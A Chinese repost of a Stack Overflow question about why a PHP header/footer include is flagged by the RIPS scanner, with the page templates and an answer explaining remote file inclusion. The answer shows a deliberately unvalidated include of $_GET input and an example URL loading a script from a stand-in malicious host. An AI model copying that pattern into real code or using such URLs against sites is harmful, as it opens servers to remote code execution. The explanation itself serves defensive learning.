gpt4 book ai didi

php - 为什么一个简单的 PHP 包含文件容易受到攻击

转载 作者:可可西里 更新时间:2023-11-01 12:36:57 27 4
gpt4 key购买 nike

我有一个 header.php 和一个 footer.php,我将它们包含在所有其他页面中,例如主页、联系方式、关于我们等。

我包含页眉和页脚文件的方式是

<?php include 'inc/header.php';
some code
some code
include 'inc/header.php'; ?>

一切都很简单,工作正常。

我决定检查我的项目是否存在漏洞并下载了 RIPS 扫描程序。扫描后结果

Userinput reaches sensitive sink.

5: include include 'inc/header.php'; // header.php
requires:
5: if(!in_array($_GET['file'], $files)) else

基本上说页眉和页脚都容易受到攻击,我应该使用

if(!in_array($_GET['file'], $files)) else

为什么一个简单的包含页眉和页脚的文件容易受到攻击?如果存在漏洞,我应该如何实现 if(!in_array($_GET['file'], $files)) else ??

header.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="icon" href="images/common/lbfavicon.ico" />
<meta name="author" content="example.com" />
<link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
<link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>

<body>
<div id="header-wrapper">
<div class="container">
<div id="nav">
<ul>
<li><a href="./">Home</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</div><!-- nav ends -->
</div><!-- container ends -->
</div><!-- header wrapper ends -->

<div id="header">
<div class="container">
<div id="logo">
<a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
</div><!-- logo ends -->
<div id="search">
<form method="get" action="searchresult.php">
<div class="form-item">
Search: <input type="text" maxlength="120" name="searchfor" />
</div>
</form>
</div><!-- search ends -->
</div><!-- container ends-->
</div><!-- header ends -->

<div class="container">
<div id="announcement">
<div id="breadcrumbs"></div>
</div><!-- announcement ends -->
<div id="pagewrapper">

页脚.php

        <div id="bottom">
<div class="column">
<h2>Abc.com</h2>
<ul>
<li><a href="about">About</a></li>
<li><a href="contact">Contact</a></li>
</ul>
</div>

<div class="column">
<h2>Mode of payment</h2>
<ul>
<li>Credit/Debit card | Cheque | Demand draft</li>
</ul>
<h2>Get in touch</h2>
<ul>
<li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
</ul>
</div>

<div class="column">
<h2>Call us / Mail us</h2>
<ul>
<li>0-9999384745 / <a href="mailto:info@example.com">info@example.com</a></li>
</ul>
<h2>Share us</h2>
<ul>
<li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
</ul>
</div>

<div style="clear: both;"></div>
</div> <!-- bottom ends -->

<div id="footer">

</div>

</div> <!--Pagewrapper end-->
</div>
</body>
</html>

最佳答案

好吧,我想这只是一个警告,但在全局范围内,当您包含名称来自用户输入的 .php 脚本时,您绝对应该检查提供的名称是否正确(以防止安全问题)。

例如,许多网站使用“全局”文件,根据用户的请求包含文件。

示例:

<?php

$get = $_GET['action'];
if ($get == "index") {
include "includes/index.php";
}
//...
else
{
include $get .".php";
}

现在假设有人想在您的网站中包含一些恶意脚本。如果您的服务器允许跨网站请求,那么人们可以指定一些可能对您的服务器或其他用户造成危险的外部脚本。

示例:./global.php?action= http://malicious4ever.com/dirtything

关于php - 为什么一个简单的 PHP 包含文件容易受到攻击,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/30191831/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com